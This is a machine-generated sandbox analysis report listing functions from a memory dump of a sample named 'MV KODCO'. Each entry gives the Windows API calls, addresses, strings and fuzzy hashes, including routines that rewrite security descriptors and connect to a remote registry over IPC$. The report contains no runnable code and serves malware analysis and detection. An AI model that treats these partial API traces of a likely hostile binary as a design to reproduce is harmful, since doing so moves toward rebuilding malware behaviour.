                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 1148790751-4113822522
                                                          • Opcode ID: 3b6bf62750c5625cf2c4601501139c402c000c1e4d423dfb6cf63804ff7f284a
                                                          • Instruction ID: 7d0d2c2bdbb3810bb827b1335c652c81d6d5b1d13be7bc42016ff84c3042929a
                                                          • Opcode Fuzzy Hash: 3b6bf62750c5625cf2c4601501139c402c000c1e4d423dfb6cf63804ff7f284a
                                                          • Instruction Fuzzy Hash: D7515971504656AFC704EF11C88596EBBE9FF98758F00486CF8C5672A1DB31EE06CB82
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00653973,00000016,0000138C,00000016,?,00000016,0067DDB4,00000000,?), ref: 006226F1
                                                          • LoadStringW.USER32(00000000,?,00653973,00000016), ref: 006226FA
                                                          • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00653973,00000016,0000138C,00000016,?,00000016,0067DDB4,00000000,?,00000016), ref: 0062271C
                                                          • LoadStringW.USER32(00000000,?,00653973,00000016), ref: 0062271F
                                                          • __swprintf.LIBCMT ref: 0062276F
                                                          • __swprintf.LIBCMT ref: 00622780
                                                          • _wprintf.LIBCMT ref: 00622829
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00622840
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 618562835-2268648507
                                                          • Opcode ID: 8c1a5fecd9eeeffb8814e261a72dd31b8112befed2ac4b35be94746b4f83468e
                                                          • Instruction ID: e07a2801930a180703f25c7c636b562db324e227e4c7cb1e5d26baf5f65ddb28
                                                          • Opcode Fuzzy Hash: 8c1a5fecd9eeeffb8814e261a72dd31b8112befed2ac4b35be94746b4f83468e
                                                          • Instruction Fuzzy Hash: 4241607280025ABACB18FBD1DD9ADEEBB7DBF55340F500065F54176092EA64AF09CF60
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0062D0D8
                                                          • __swprintf.LIBCMT ref: 0062D0FA
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0062D137
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0062D15C
                                                          • _memset.LIBCMT ref: 0062D17B
                                                          • _wcsncpy.LIBCMT ref: 0062D1B7
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0062D1EC
                                                          • CloseHandle.KERNEL32(00000000), ref: 0062D1F7
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0062D200
                                                          • CloseHandle.KERNEL32(00000000), ref: 0062D20A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: 649fe108f4233c7bf308cfeeb2ecb4577bf64688c1c88d04e19f58e84aa5ea33
                                                          • Instruction ID: f5e6486ad021ec49e5e71259d89409556b4f8e0a1ac07ece204fd7e02a8962f6
                                                          • Opcode Fuzzy Hash: 649fe108f4233c7bf308cfeeb2ecb4577bf64688c1c88d04e19f58e84aa5ea33
                                                          • Instruction Fuzzy Hash: AB31A372A40119ABDB21DFA0DC49FEB77BEEF89741F1040BAF609D21A1E77097458B24
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                          • String ID:
                                                          • API String ID: 884005220-0
                                                          • Opcode ID: d9cdca700b09989bbd56986f920814ea88c47dc74afefa18324b75a4b3cceb72
                                                          • Instruction ID: 5c538691be9126493d9c0ddc3177c42661fa6aab63f0e15a271115f0b589b211
                                                          • Opcode Fuzzy Hash: d9cdca700b09989bbd56986f920814ea88c47dc74afefa18324b75a4b3cceb72
                                                          • Instruction Fuzzy Hash: 2F61E272940311AFEB646F68DC417EA37A7EF15320F280529F801AB2D1DF34DD818BA9
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0064E754
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0064E76B
                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0064E776
                                                          • CloseHandle.KERNEL32(00000000), ref: 0064E783
                                                          • GlobalLock.KERNEL32(00000000), ref: 0064E78C
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0064E79B
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0064E7A4
                                                          • CloseHandle.KERNEL32(00000000), ref: 0064E7AB
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0064E7BC
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0066D9BC,?), ref: 0064E7D5
                                                          • GlobalFree.KERNEL32(00000000), ref: 0064E7E5
                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 0064E809
                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0064E834
                                                          • DeleteObject.GDI32(00000000), ref: 0064E85C
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0064E872
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: d1bdf7e4955b92fa6f8293fedb38a8762c85a06596e892ef4a997bc054c9e578
                                                          • Instruction ID: ae53f229176aa60ba0f17a4f27b1b4ed9b1d3018dbf22ff06b9469854c46c90e
                                                          • Opcode Fuzzy Hash: d1bdf7e4955b92fa6f8293fedb38a8762c85a06596e892ef4a997bc054c9e578
                                                          • Instruction Fuzzy Hash: 32415B75A00204FFDB119F65CC88EAABBBAFF89721F108058F906D7260D7B1AD41CB60
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 0063076F
                                                          • _wcscat.LIBCMT ref: 00630787
                                                          • _wcscat.LIBCMT ref: 00630799
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006307AE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 006307C2
                                                          • GetFileAttributesW.KERNEL32(?), ref: 006307DA
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 006307F4
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00630806
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: 8804a5c4552bc998fbc931f69ef4f09f5d4bf9a71f70eb3a3d9153edda9600ef
                                                          • Instruction ID: 99e5628c48a5c33148cf8f804cd544c13354cea17c95a74bc5cc476b6e91ff52
                                                          • Opcode Fuzzy Hash: 8804a5c4552bc998fbc931f69ef4f09f5d4bf9a71f70eb3a3d9153edda9600ef
                                                          • Instruction Fuzzy Hash: E381AF715043459FEB64DF24C8659AAB7EABBC9304F14882EF885C7351E630D949CB92
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0064EF3B
                                                          • GetFocus.USER32 ref: 0064EF4B
                                                          • GetDlgCtrlID.USER32(00000000), ref: 0064EF56
                                                          • _memset.LIBCMT ref: 0064F081
                                                          • GetMenuItemInfoW.USER32 ref: 0064F0AC
                                                          • GetMenuItemCount.USER32(00000000), ref: 0064F0CC
                                                          • GetMenuItemID.USER32(?,00000000), ref: 0064F0DF
                                                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0064F113
                                                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0064F15B
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0064F193
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0064F1C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 3b6813916965ebc15112638d6ef92c8bee0692b3aec3a982423f66fd12d37ef7
                                                          • Instruction ID: 8056850a0fea6a28cbee0d49094bc9791ae22b3b98ec124f86f5c2ac11eb5545
                                                          • Opcode Fuzzy Hash: 3b6813916965ebc15112638d6ef92c8bee0692b3aec3a982423f66fd12d37ef7
                                                          • Instruction Fuzzy Hash: 26819C70604311EFDB20DF14C884AABBBEAFF89714F04492EF99597291D771D905CBA2
                                                          APIs
                                                            • Part of subcall function 0061ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0061ABD7
                                                            • Part of subcall function 0061ABBB: GetLastError.KERNEL32(?,0061A69F,?,?,?), ref: 0061ABE1
                                                            • Part of subcall function 0061ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0061A69F,?,?,?), ref: 0061ABF0
                                                            • Part of subcall function 0061ABBB: HeapAlloc.KERNEL32(00000000,?,0061A69F,?,?,?), ref: 0061ABF7
                                                            • Part of subcall function 0061ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0061AC0E
                                                            • Part of subcall function 0061AC56: GetProcessHeap.KERNEL32(00000008,0061A6B5,00000000,00000000,?,0061A6B5,?), ref: 0061AC62
                                                            • Part of subcall function 0061AC56: HeapAlloc.KERNEL32(00000000,?,0061A6B5,?), ref: 0061AC69
                                                            • Part of subcall function 0061AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0061A6B5,?), ref: 0061AC7A
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0061A8CB
                                                          • _memset.LIBCMT ref: 0061A8E0
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0061A8FF
                                                          • GetLengthSid.ADVAPI32(?), ref: 0061A910
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0061A94D
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0061A969
                                                          • GetLengthSid.ADVAPI32(?), ref: 0061A986
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0061A995
                                                          • HeapAlloc.KERNEL32(00000000), ref: 0061A99C
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0061A9BD
                                                          • CopySid.ADVAPI32(00000000), ref: 0061A9C4
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0061A9F5
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0061AA1B
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0061AA2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 940b095c1632346b4eae36f9e016e7fecfab0d3abdaae36af5223eaf92612a60
                                                          • Instruction ID: bdec435c532bcfd03b464af98beae15308280e91843ec2c11152ff6b3f3cceb3
                                                          • Opcode Fuzzy Hash: 940b095c1632346b4eae36f9e016e7fecfab0d3abdaae36af5223eaf92612a60
                                                          • Instruction Fuzzy Hash: 96514C71A01209AFDF10DFA5DD85EEEBBBAFF04300F08811AF915A7290DB759A45CB61
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00639E36
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00639E42
                                                          • CreateCompatibleDC.GDI32(?), ref: 00639E4E
                                                          • SelectObject.GDI32(00000000,?), ref: 00639E5B
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00639EAF
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00639EEB
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00639F0F
                                                          • SelectObject.GDI32(00000006,?), ref: 00639F17
                                                          • DeleteObject.GDI32(?), ref: 00639F20
                                                          • DeleteDC.GDI32(00000006), ref: 00639F27
                                                          • ReleaseDC.USER32(00000000,?), ref: 00639F32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 97ca6d3c67a3f029f141ebdfa9d81c508d7b2d23aac2b906d7884c1e232a07ad
                                                          • Instruction ID: cae18de0d9826032303c23f596ff950ed89b75057902dc8b4ed4ed3dc8f4cc89
                                                          • Opcode Fuzzy Hash: 97ca6d3c67a3f029f141ebdfa9d81c508d7b2d23aac2b906d7884c1e232a07ad
                                                          • Instruction Fuzzy Hash: 53513B75A04309AFCB14CFA8CC85EAEBBBAEF48710F14841DF95997210C7B5A941CFA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 2889450990-2391861430
                                                          • Opcode ID: 7418982915b26b752f228776e5049cc58125a4c0f2ad314d8eeafec42a8e1c22
                                                          • Instruction ID: 5698d5f8b4cdcf572db8d6dfe3016dbfa7a149029eb39f14274df17f51add875
                                                          • Opcode Fuzzy Hash: 7418982915b26b752f228776e5049cc58125a4c0f2ad314d8eeafec42a8e1c22
                                                          • Instruction Fuzzy Hash: F351BE3180055ABACF19EBA0DD46EEEBB7ABF05304F100065F545761A2EB706F59DF60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 2889450990-3420473620
                                                          • Opcode ID: a40b298d5f24c5ad038b417c698611a4234769af673414c79ce65ffd359bcf94
                                                          • Instruction ID: 382a175def6ee2b4b038220f6e89dbc1aa7e6071ba60b5b2132c27d15367d348
                                                          • Opcode Fuzzy Hash: a40b298d5f24c5ad038b417c698611a4234769af673414c79ce65ffd359bcf94
                                                          • Instruction Fuzzy Hash: 4651BD3190066AAACF19EBE0DD46EEEBB7ABF05344F100065F105721A2EB706F59CF60
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00642BB5,?,?), ref: 00643C1D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: $Ei$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-3761451328
                                                          • Opcode ID: 3c07e6f02d1b8bf1f5dfe6cb433840a75513431abfe6bc10e005a569ada9f9b9
                                                          • Instruction ID: 021d6ea9a596050a5bdd097951a515483728e93b7e65a435ca296a03b82a1b5c
                                                          • Opcode Fuzzy Hash: 3c07e6f02d1b8bf1f5dfe6cb433840a75513431abfe6bc10e005a569ada9f9b9
                                                          • Instruction Fuzzy Hash: E7415E3050029A8BDF14EF54D855AEA3B66FF62340F504424FC951B7A2EB74AE0BCB10
                                                          APIs
                                                          • _memset.LIBCMT ref: 006255D7
                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00625664
                                                          • GetMenuItemCount.USER32(006A1708), ref: 006256ED
                                                          • DeleteMenu.USER32(006A1708,00000005,00000000,000000F5,?,?), ref: 0062577D
                                                          • DeleteMenu.USER32(006A1708,00000004,00000000), ref: 00625785
                                                          • DeleteMenu.USER32(006A1708,00000006,00000000), ref: 0062578D
                                                          • DeleteMenu.USER32(006A1708,00000003,00000000), ref: 00625795
                                                          • GetMenuItemCount.USER32(006A1708), ref: 0062579D
                                                          • SetMenuItemInfoW.USER32(006A1708,00000004,00000000,00000030), ref: 006257D3
                                                          • GetCursorPos.USER32(?), ref: 006257DD
                                                          • SetForegroundWindow.USER32(00000000), ref: 006257E6
                                                          • TrackPopupMenuEx.USER32(006A1708,00000000,?,00000000,00000000,00000000), ref: 006257F9
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00625805
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 3993528054-0
                                                          • Opcode ID: 269c4428558553af77202b19461d0151d35784a730bd21073916c806a9e3b1c3
                                                          • Instruction ID: 206ba761e51149385adb2a9a898de6e796771023fbc9604f6ebd3322c025f41a
                                                          • Opcode Fuzzy Hash: 269c4428558553af77202b19461d0151d35784a730bd21073916c806a9e3b1c3
                                                          • Instruction Fuzzy Hash: 5571D170640A25BAEB309B55EC49FEABF66FF00364F244205F51A6A2E1CBB16C10DF95
                                                          APIs
                                                          • _memset.LIBCMT ref: 0061A1DC
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0061A211
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0061A22D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0061A249
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0061A273
                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0061A29B
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0061A2A6
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0061A2AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 1687751970-22481851
                                                          • Opcode ID: 294b2a92655f0eef989e92adceb9bdd409c3ab7883701d2fa5d3818845b59ed6
                                                          • Instruction ID: 02b65136491a4a8c215d499749c44d9ef0f0ff0ede1c6e372c6f07a7606bfe3d
                                                          • Opcode Fuzzy Hash: 294b2a92655f0eef989e92adceb9bdd409c3ab7883701d2fa5d3818845b59ed6
                                                          • Instruction Fuzzy Hash: 07412876C1022AABCF15EBA4DC99DEEBB79FF48344F044029E941B3260EB709E45CB50
                                                          APIs
